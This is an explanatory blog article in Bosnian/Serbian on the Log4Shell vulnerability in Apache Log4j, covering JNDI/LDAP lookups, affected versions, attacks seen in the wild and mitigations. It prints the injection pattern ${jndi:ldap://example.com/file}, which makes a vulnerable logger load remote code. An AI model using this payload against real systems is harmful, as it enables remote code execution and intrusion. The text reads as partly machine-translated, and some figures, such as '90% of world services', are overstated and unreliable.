Sadržaj[Sakrij][Prikaži]
Krajem novembra 2021. otkrili smo veliku prijetnju sajber sigurnosti. Ova eksploatacija bi potencijalno mogla uticati na milione kompjuterskih sistema širom sveta.
Ovo je vodič o ranjivosti Log4j i kako je zanemarena greška u dizajnu ostavila preko 90% svjetskih kompjuterskih usluga otvorenim za napad.
Apache Log4j je open-source uslužni program za evidentiranje zasnovan na Javi koji je razvio Apache Software Foundation. Prvobitno je napisao Ceki Gülcü 2001. godine, a sada je dio Apache Logging Services, projekta Apache Software Foundation.
Kompanije širom svijeta koriste Log4j biblioteku kako bi omogućile prijavljivanje na svoje aplikacije. U stvari, Java biblioteka je toliko sveprisutna da je možete pronaći u aplikacijama od Amazona, Microsofta, Googlea i drugih.
Istaknutost biblioteke znači da bi svaki potencijalni nedostatak u kodu mogao ostaviti milione računara otvorenim za hakovanje. Dana 24. novembra 2021. godine, a sigurnost u oblaku istraživač koji radi za Alibabu otkrio je strašnu manu.
Ranjivost Log4j, takođe poznata kao Log4Shell, postoji neprimećeno od 2013. Ranjivost je omogućila zlonamernim akterima da pokreću kod na pogođenim sistemima koji koriste Log4j. To je javno objavljeno 9. decembra 2021
Industrijski stručnjaci zovu nedostatak Log4Shell-a najveća ranjivost u posljednje vrijeme.
U sedmici nakon objavljivanja ranjivosti, timovi za sajber sigurnost otkrili su milione napada. Neki istraživači su čak primijetili stopu od preko stotinu napada u minuti.
Kako funkcioniše?
Da bismo razumjeli zašto je Log4Shell toliko opasan, moramo razumjeti za šta je sposoban.
Log4Shell ranjivost dozvoljava proizvoljno izvršavanje koda, što u osnovi znači da napadač može pokrenuti bilo koju naredbu ili kod na ciljnoj mašini.
Kako to postiže?
Prvo, moramo razumjeti šta je JNDI.
Java interfejs za imenovanje i imenik (JNDI) je Java usluga koja omogućava Java programima da otkriju i traže podatke i resurse preko imena. Ove usluge imenika su važne jer obezbeđuju organizovan skup zapisa za programere da ih lako referenciraju prilikom kreiranja aplikacija.
JNDI može koristiti različite protokole za pristup određenom direktoriju. Jedan od ovih protokola je Lightweight Directory Access Protocol, ili LDAP.
Prilikom evidentiranja stringa, log4j vrši zamjene stringova kada naiđu na izraze oblika ${prefix:name}
.
Na primjer, Text: ${java:version}
može biti zaveden kao Tekst: Java verzija 1.8.0_65. Ove vrste zamjena su uobičajene.
Možemo imati i izraze kao npr Text: ${jndi:ldap://example.com/file}
koji koristi JNDI sistem za učitavanje Java objekta sa URL-a preko LDAP protokola.
Ovo efektivno učitava podatke koji dolaze sa tog URL-a u mašinu. Svaki potencijalni haker može ugostiti zlonamjerni kod na javnom URL-u i čekati da ga strojevi koji koriste Log4j zabilježe.
Pošto sadržaj poruka dnevnika sadrži podatke koje kontroliše korisnik, hakeri mogu umetnuti sopstvene JNDI reference koje upućuju na LDAP servere koje oni kontrolišu. Ovi LDAP serveri mogu biti puni zlonamjernih Java objekata koje JNDI može izvršiti kroz ranjivost.
Ono što ovo čini gorim je to što nije važno da li je aplikacija serverska ili klijentska.
Sve dok postoji način da loger pročita zlonamjerni kod napadača, aplikacija je i dalje otvorena za eksploatacije.
Ko je pogođen?
Ranjivost utiče na sve sisteme i usluge koji koriste APache Log4j, sa verzijama od 2.0 do i uključujući 2.14.1.
Nekoliko stručnjaka za sigurnost savjetuje da ranjivost može utjecati na brojne aplikacije koje koriste Javu.
Greška je prvi put otkrivena u video igrici Minecraft u vlasništvu Microsofta. Microsoft je pozvao svoje korisnike da nadograde svoje Java izdanje Minecraft softvera kako bi spriječili bilo kakav rizik.
Jen Easterly, direktorica Agencije za kibernetičku sigurnost i sigurnost infrastrukture (CISA) kaže da dobavljači imaju velika odgovornost kako bi se spriječilo krajnje korisnike od zlonamjernih aktera koji iskorištavaju ovu ranjivost.
„Prodavci bi također trebali komunicirati sa svojim kupcima kako bi osigurali da krajnji korisnici znaju da njihov proizvod sadrži ovu ranjivost i trebali bi dati prioritet ažuriranju softvera.”
Napadi su navodno već počeli. Symantec, kompanija koja nudi softver za sajber sigurnost, primijetila je različit broj zahtjeva za napadima.
Evo nekoliko primjera vrsta napada koje su istraživači otkrili:
- botnet
Botneti su mreža računara koja su pod kontrolom jedne napadačke strane. Pomažu u izvođenju DDoS napada, krađi podataka i drugim prijevarama. Istraživači su primijetili Muhstik botnet u shell skriptama preuzetim sa Log4j eksploatacije.
- XMRig Miner trojanac
XMRig je rudar kriptovaluta otvorenog koda koji koristi CPU za rudarenje Monero tokena. Sajber kriminalci mogu instalirati XMRig na uređaje ljudi kako bi mogli koristiti svoju procesorsku snagu bez njihovog znanja.
- Khonsari Ransomware
Ransomware se odnosi na oblik zlonamjernog softvera koji je dizajniran za šifriranje fajlova na kompjuteru. Napadači tada mogu zahtijevati plaćanje u zamjenu za vraćanje pristupa šifriranim datotekama. Istraživači su otkrili Khonsari ransomware u Log4Shell napadima. Oni ciljaju Windows servere i koriste .NET framework.
Šta se dalje dešava?
Stručnjaci predviđaju da će možda trebati mjeseci ili čak godine da se u potpunosti popravi haos koji je izazvala ranjivost Log4J.
Ovaj proces uključuje ažuriranje svakog pogođenog sistema sa zakrpljenom verzijom. Čak i ako su svi ovi sistemi zakrpljeni, još uvijek postoji prijetnja mogućih backdoor-a koje su hakeri možda već dodali prozoru da su serveri otvoreni za napad.
Mnogi rješenja i ublažavanja postoje kako bi se spriječilo da ove greške iskorištavaju aplikacije. Nova verzija Log4j 2.15.0-rc1 promijenila je različite postavke kako bi ublažila ovu ranjivost.
Sve funkcije koje koriste JNDI bit će onemogućene prema zadanim postavkama, a udaljena pretraživanja su također ograničena. Onemogućavanje funkcije pretraživanja na vašem Log4j postavci pomoći će u smanjenju rizika od mogućih eksploatacija.
Izvan Log4j, i dalje postoji potreba za širim planom za sprečavanje eksploatacije otvorenog koda.
Ranije u maju, Bijela kuća je objavila izvršni nalog koji je imao za cilj poboljšanje nacionalne sajber bezbjednosti. To je uključivalo odredbu za softverski popis materijala (SBOM) koji je u suštini bio formalni dokument koji je sadržavao listu svake stavke potrebne za izradu aplikacije.
Ovo uključuje dijelove kao što su open source pakete, zavisnosti i API-je koji se koriste za razvoj. Iako su ideje SBOM-a korisne za transparentnost, hoće li zaista pomoći potrošaču?
Nadogradnja zavisnosti može predstavljati preveliku gnjavažu. Kompanije mogu jednostavno odlučiti da plate bilo koju kaznu umjesto da rizikuju gubljenje dodatnog vremena tražeći alternativne pakete. Možda će ti SBOM-ovi biti korisni samo ako budu obim dalje je ograničen.
zaključak
Problem Log4j je više od samo tehničkog problema za organizacije.
Poslovni lideri moraju biti svjesni potencijalnih rizika koji mogu nastati kada se njihovi serveri, proizvodi ili usluge oslanjaju na kod koji oni sami ne održavaju.
Oslanjanje na aplikacije otvorenog koda i aplikacije trećih strana uvijek nosi određenu količinu rizika. Kompanije treba da razmotre izradu strategija za smanjenje rizika prije nego što nove prijetnje izađu na vidjelo.
Veliki dio weba se oslanja na softver otvorenog koda koji održavaju hiljade volontera širom svijeta.
Ako želimo da web zadržimo sigurnim mjestom, vlade i korporacije trebale bi ulagati u financiranje napora otvorenog koda i agencija za kibernetičku sigurnost kao što su CISA.
Ostavite odgovor